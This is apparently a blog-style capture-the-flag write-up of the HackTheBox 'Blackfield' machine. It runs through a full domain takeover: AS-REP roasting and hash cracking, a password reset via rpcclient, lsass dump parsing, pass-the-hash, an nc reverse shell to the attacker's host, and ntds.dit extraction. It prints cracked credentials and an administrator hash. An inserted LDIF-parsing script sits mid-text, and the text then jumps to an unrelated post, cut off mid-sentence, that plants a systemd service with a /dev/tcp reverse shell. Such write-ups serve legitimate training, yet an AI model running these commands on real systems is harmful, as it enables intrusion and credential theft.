HacktheBox - Blackfield - Retired


Recon

I've been using threader3000 for my initial scan lately. It's a threaded Python scanner that scans all TCP ports and then suggests an nmap scan based on the ports it found open.



/home/circusmonkey404/.local/bin/threader3000 


Threader3000 also writes the nmap output to XML, which I then convert to HTML using xsltproc


xsltproc blackfield.htb.xml -o blackfield.htm




So we have these ports open:

53 DNS
88 Kerberos
135 RPC
389 LDAP
445 SMB
593 RPC
3268 LDAP (global catalog)



So just starting out, it looks like this is definitely a Windows box and possibly a Domain Controller. LDAP, Kerberos and DNS all being present on one host is usually an indicator of a domain controller.


We also get a little more info from the nmap scan that doesn't show up in the HTML converted from the XML



Looks like the domain is blackfield.local and the name of this machine is DC01



Well there is no web server here. So what to look at first?


How about SMB? Let's see if there are any shares open to anonymous access.


To list the shares we'll try smbclient


The -L switch will list any shares we might be able to connect to


smbclient -L \\\\blackfield.htb   <- on Linux we have to double up the backslashes, so \\blackfield.htb becomes \\\\blackfield.htb


We will get prompted for a password but will just hit enter to use no authentication.



Well, there are a lot of shares we might have access to, so we will try to connect to them now to see if we can really get into them or if they need authentication.


We'll use smbclient again to connect 


The syntax would be


smbclient -U "" \\\\blackfield.htb\\sharename


Here are the results of me trying several shares.


Looks like we can anonymously connect to some of them, but aren't allowed to list their files with dir.


Let's try a little recon on the DNS service.


dig @10.10.10.192 -t NS blackfield.local




As we saw earlier, the name server is dc01.blackfield.local


Let's check if it's the global catalog

dig @10.10.10.192 _gc.blackfield.local



Yup it is.


I tried enum4linux here to see if we could anonymously get some info out of the domain controller and it didn't return any results.


I can connect using rpcclient


rpcclient -U "" -N 10.10.10.192


But I get access denied when trying to enumerate manually






I eventually circled back around to SMB. I found that when connected to the profiles$ share we could run dir


smbclient -U "" \\\\blackfield.htb\\profiles$




We get a metric crapton of usernames



I copied the usernames out to a file on my kali box called users.txt


Exploit

Now that we have this list we can see if any of these accounts are open to AS-REP roasting


https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/




So by default, when a user authenticates to a domain there is a step called preauthentication, in which they are challenged to prove they know their password before a ticket is issued. This is the default when setting up a new account in AD; its purpose is to protect against brute forcing a user's password. But you can opt out of preauthentication by checking one simple checkbox on the user's account in AD.


To see if any of these users have preauthentication turned off we will use an impacket tool called GetNPUsers.py


The basic syntax is this


python3 GetNPUsers.py <domainname>/ -usersfile <list of users> -format <how you want the output formatted: hashcat or john> -outputfile <where you want the file written>


So for our example here we know the domain is blackfield.local. First, let's add that to our /etc/hosts file


sudo mousepad /etc/hosts


Then add 10.10.10.192 blackfield.local 


And save the file


Now for our command it will end up looking like this.


python3 GetNPUsers.py blackfield.local/ -usersfile /home/circusmonkey404/Desktop/HTB/blackfield/Users.txt -format hashcat -outputfile /home/circusmonkey404/Desktop/HTB/blackfield/hashes.asreproast



Then we let the tool eat.



Here in the output you can see a lot of failures (session errors).

It can be a little confusing the first time you run this tool, because it doesn't highlight which account it worked on. But if you check the output file, you can see we were able to get a ticket




So since we formatted this to hashcat, now we need to feed this to hashcat to get the password back.



So we need to figure out which mode to set hashcat to


If we run

hashcat --help

we can get a list of the modes


Looks like we need 18200 for an AS-REP


So our command will end up looking like this


hashcat -m 18200 -a 0 /home/circusmonkey404/Desktop/HTB/blackfield/hashes.asreproast /usr/share/wordlists/rockyou.txt --force --outfile /home/circusmonkey404/Desktop/HTB/blackfield/cracked.txt



We give it the mode: -m 18200

The type of attack: -a 0 (straight, i.e. plain dictionary attack)

The location of our saved hashes: /home/circusmonkey404/Desktop/HTB/blackfield/hashes.asreproast

The wordlist to use: /usr/share/wordlists/rockyou.txt

--force (this is because my Kali is a VM and it complains about resources)

--outfile, where we want the cracked password written: /home/circusmonkey404/Desktop/HTB/blackfield/cracked.txt



Hashcat says it was able to get the password for us, so let's check our output file.


cat /home/circusmonkey404/Desktop/HTB/blackfield/cracked.txt




Looks like the password is #00^BlackKnight


Let's try to connect to SMB with that password and see if it works


smbclient -L //blackfield.local -U blackfield\\support



Let's see if we can get more access to any of these shares now that we are an authenticated user.


smbclient -L //blackfield.local -U blackfield\\support





Cool, let's try some of the shares now.


Looks like we can still get into profiles$ but not the admin shares, and we still can't dir on any of them except profiles$...


Well, let's try enum4linux. Sometimes admins are lazy and put the passwords for service accounts in the description field in AD. I know when I was starting out this was common at a place I worked.



enum4linux -u blackfield\\support -p '#00^BlackKnight' -U blackfield.local




No such luck here.



So now that we are authenticated we can dump the entire LDAP directory to see if we can learn anything from it.



ldapsearch -D 'blackfield\support' -w '#00^BlackKnight' -x -b "dc=blackfield,dc=local" "*" -h 10.10.10.192  > /home/circusmonkey404/Desktop/HTB/blackfield/ldap.txt


This dumps all of the LDAP info and puts it in a file called ldap.txt


We can now grep against that to look for info. I like to see who is in the IT department


grep "IT" -B 7 -A 15 ./ldap.txt > ITDept.txt


This will grep for IT, select the 7 lines before and the 15 lines after each match, and put them in a file named ITDept.txt


Some of the interesting things we can look at here are the last logon and logoff times


For example, here the Administrator account is the only one with IT set as their department that has ever logged into the domain.


Using a similar search I grepped for logonCount: and looked for accounts that had actually been logged into (the pattern matches any count whose first digit is 1-9, i.e. anything above zero)


grep "logonCount: [1-9]" -B 7 -A 15 ./ldap.txt


Administrator
Guest
svc_backup



These were the only accounts that have ever actually been logged into. This might not be helpful in a real pentest, but here on HackTheBox we can assume this means these accounts are going to be important


Especially

Administrator

svc_backup


I grepped for svc_backup


And found they are members of Backup Operators and Remote Management Users
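As an added example (not code from the write-up), here is a small Python parser for the ldapsearch dump that answers the same questions the greps above do, plus the one GetNPUsers.py answers in the Exploit section: which accounts have Kerberos preauthentication disabled (userAccountControl bit 0x400000, the flag an AS-REP roast depends on and worth auditing for), which accounts have a non-zero logonCount, and which groups an account belongs to. The LDIF sample is constructed for the example; the attribute names are the standard AD ones.

```python
import re
from typing import Callable, Dict, List

# Constructed LDIF standing in for the write-up's ldap.txt (ldapsearch output).
# Names, flags and counts are made up for the example; the real dump is far larger.
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=BLACKFIELD,DC=local
sAMAccountName: support
userAccountControl: 4260352
logonCount: 0

dn: CN=svc_backup,CN=Users,DC=BLACKFIELD,DC=local
sAMAccountName: svc_backup
userAccountControl: 66048
logonCount: 5
memberOf: CN=Backup Operators,CN=Builtin,DC=BLACKFIELD,DC=local
memberOf: CN=Remote Management Users,CN=Builtin,DC=BLACKFIELD,
 DC=local
"""

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit "Do not require Kerberos preauthentication"

def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """One dict per entry. ldapsearch folds long values onto continuation
    lines that start with a space, so unfold those before splitting."""
    text = re.sub(r"\r?\n ", "", text)
    entries: List[Dict[str, List[str]]] = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry: Dict[str, List[str]] = {}
        for line in block.splitlines():
            if line.startswith("#") or ":" not in line:
                continue
            key, _, value = line.partition(":")
            if not value.startswith(":"):  # "::" marks a base64 value, not needed here
                entry.setdefault(key.strip(), []).append(value.strip())
        if entry:
            entries.append(entry)
    return entries

def sam_names(entries: List[Dict[str, List[str]]], keep: Callable[[Dict[str, List[str]]], bool]) -> List[str]:
    return [e["sAMAccountName"][0] for e in entries if "sAMAccountName" in e and keep(e)]

def no_preauth_accounts(entries: List[Dict[str, List[str]]]) -> List[str]:
    """Accounts an AS-REP roast can target: the same flag GetNPUsers.py keys on."""
    return sam_names(entries, lambda e: bool(int(e.get("userAccountControl", ["0"])[0]) & DONT_REQ_PREAUTH))

def ever_logged_on(entries: List[Dict[str, List[str]]]) -> List[str]:
    """Numeric version of the write-up's grep "logonCount: [1-99]": count above zero."""
    return sam_names(entries, lambda e: int(e.get("logonCount", ["0"])[0]) > 0)

def groups_of(entries: List[Dict[str, List[str]]], sam: str) -> List[str]:
    """Group CNs from memberOf, e.g. to spot Backup Operators membership."""
    for e in entries:
        if e.get("sAMAccountName", [""])[0].lower() == sam.lower():
            return [re.match(r"CN=([^,]+)", g).group(1) for g in e.get("memberOf", [])]
    return []
```

Point it at a real dump with parse_ldif(open("ldap.txt").read()) and the same three functions apply unchanged.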


Googling around for escalation techniques using rpcclient, I found this: https://malicious.link/post/2017/reset-ad-user-password-with-linux/


If the user is privileged to reset passwords in the domain, they can do this via rpcclient as well.


The account we have access to now is called support. I would assume a big part of the support role in an IT department is resetting users' passwords.


I find some users to test on. I find it interesting that the UPNs for the users in this AD environment are almost exclusively of the form


BLACKFIELD*RANDOMNUMBERS*@BLACKFIELD.local


I picked on a person in the IT department to try first, since they are usually more privileged than other users.


When I tried

setuserinfo2 BLACKFIELD496547 24 'Winter2020!'


I got an access denied. I got this for all of the AD users I tried with UPNs of the form Blackfield*somenumber*@blackfield.local


I double checked the password requirements in case this password didn't meet them


Minimum length 7 and complexity is on, so my test password should work. Maybe this support account only has access to reset passwords on specific accounts or OUs... What about the users that have different UPNs?


I used grep to filter out all accounts whose name started with BLACKFIELD.

I'm sure there is a more elegant way to do this, but it worked. :)


grep "sAMAccountName" ./ldap.txt | grep -v "sAMAccountName: BLACKFIELD"





I broke this list down further to real user accounts rather than built-in AD accounts and got these. I did this just using my knowledge of Active Directory and what the built-in account names are.


This is the result of pruning some more.

sAMAccountName: audit2020
sAMAccountName: support
sAMAccountName: svc_backup
sAMAccountName: lydericlefebvre



We already have the password for support.


So that really leaves


sAMAccountName: audit2020
sAMAccountName: svc_backup
sAMAccountName: lydericlefebvre


Let's start with the first one. There was an SMB share called forensic that I imagine they would have access to.


Let's see if we can reset audit2020's password.


setuserinfo2 audit2020 24 'Winter2020!'




No error. Let's try connecting to SMB again as this user.




We were able to connect to the forensic share.


Let's poke around.


Well, in the commands_output folder we found some outputs of commands from what looks like a pentest done against the company.


But under the memory_analysis folder we find what looks like a dump of the lsass process. Named lsass.zip.


I tried transferring this via smbclient but it would eventually time out



So I mounted the share directly in Kali to transfer it to my box.


If you are unfamiliar with lsass... well, you should get to know it.


From Wikipedia

"Local Security Authority Subsystem Service is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens"


But for our purpose here it basically holds the plaintext passwords for the machine.  We just need to dump the process using a program like procdump. Then we can load it up in mimikatz to get our plaintext passwords out.



Here is a blog post showing the steps needed to get to these passwords.

https://medium.com/@ali.bawazeeer/using-mimikatz-to-get-cleartext-password-from-offline-memory-dump-76ed09fd3330



Well, I've run mimikatz plenty of times on Windows machines... but never on Kali.



I found pypykatz, which is a Python implementation of mimikatz. So let's try it out.


I found this blog which gave me the syntax


https://en.hackndo.com/remote-lsass-dump-passwords/



pypykatz lsa minidump /home/circusmonkey404/Desktop/HTB/blackfield/lsass.DMP


Ok let's see what we get…



We see that svc_backup account


We can see hashes but not the actual password…


Same thing for the Administrator account.



So we got a hash but no password. I think this is ok; we can try to just pass the hash to get in.


Since WinRM is available to use, we can try to pass the hash with it.


Of course I tried the Administrator account first, but no dice. Maybe they changed the Administrator password since that lsass dump was made



But we had better luck with svc_backup



And from here we can get to the user.txt in C:\Users\svc_backup\Desktop


Now we need to figure out a path to root.




https://roberthosborne.com/privesc


I found this blog that talks about using our backup privileges to export a copy of ntds.dit


The basic idea is that since svc_backup is part of Backup Operators it has SeBackupPrivilege. We can leverage this to make a backup copy of the domain's ntds.dit file; if we can get that, and also dump the SYSTEM registry hive, we can get hashes or passwords to use to get into the administrator account.





So we need to start by making a shadow copy of the C: drive using diskshadow, so we can access the normally locked ntds.dit file.


It took me a while to get this going, so I just want to point this out: for some reason diskshadow needs an extra character at the end of each of these commands in order for them to execute properly. Also, I couldn't get PowerShell to enter diskshadow, so I set up another reverse shell for cmd.exe, which could enter diskshadow correctly.



diskshadow
set context persistent nowriters
add volume c: alias dmwong
create
expose %dmwong% z:



So to get to cmd.exe


I started a nc listener on my kali box


nc -lnvp 5555



Then from blackfield I used the same NC64.exe I used earlier to get my shell


C:\temp\circusmonkey\NC64.exe 10.10.14.6 5555 -e cmd.exe






Now we just enter our diskshadow commands with a ; at the end for some reason :)



DiskShadow
Set context persistent nowriters;
Add volume C: alias circusmonkey;
Create;
Expose %circusmonkey% Z:;



Now we need to import a couple of powershell modules to access the exposed shadow copy which is now Z:


https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug


We can use the built-in upload feature of evil-winrm to do this for us. Since I have the two DLLs in the same folder I launched evil-winrm from, I just do


upload ./SeBackupPrivilegeUtils.dll
upload ./SeBackupPrivilegeCmdLets.dll


Now we need to import those modules into powershell with our evil-winRM connection.


Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll




Now we will check to see if they imported correctly


get-help SeBackupPrivilege



Now we just need to copy the ntds.dit file out of the exposed shadow copy.


Copy-FileSeBackupPrivilege z:\windows\NTDS\ntds.dit c:\temp\circusmonkey\ntds.dit -Overwrite


Now we need the system registry hive 


reg.exe save HKLM\SYSTEM C:\temp\circusmonkey\system.hive


download system.hive
download ntds.dit


Now we can use impacket's secretsdump to get the hashes out of these files



python3 /tools/impacket/examples/secretsdump.py -ntds ntds.dit -system system.hive LOCAL




Now let's try to pass this hash with evil-winrm


evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee



type ../Desktop/root.txt


Well that is not what I wanted to see.


Access denied reading root.txt



But there is this note.



Mates,

After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.

We will probably have to backup & restore things later.
- Mike.

PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)



In the Documents folder there is a PS1 script called watcher.ps1

sleep 30

$file = "C:\Users\Administrator\Desktop\root.txt"
$command = "(Get-Item -Path $file).Encrypt()"


So we can guess this is running on a schedule to re-encrypt the file every 30 seconds.


But since we know how they are encrypting it, we can just reverse this to decrypt the file


$file = "C:\Users\Administrator\Desktop\root.txt"
$command = "(Get-Item -Path $file).Decrypt()"
Invoke-Expression $command   # on its own, $command only prints the string; this actually runs it


*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
4375a*************************











Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The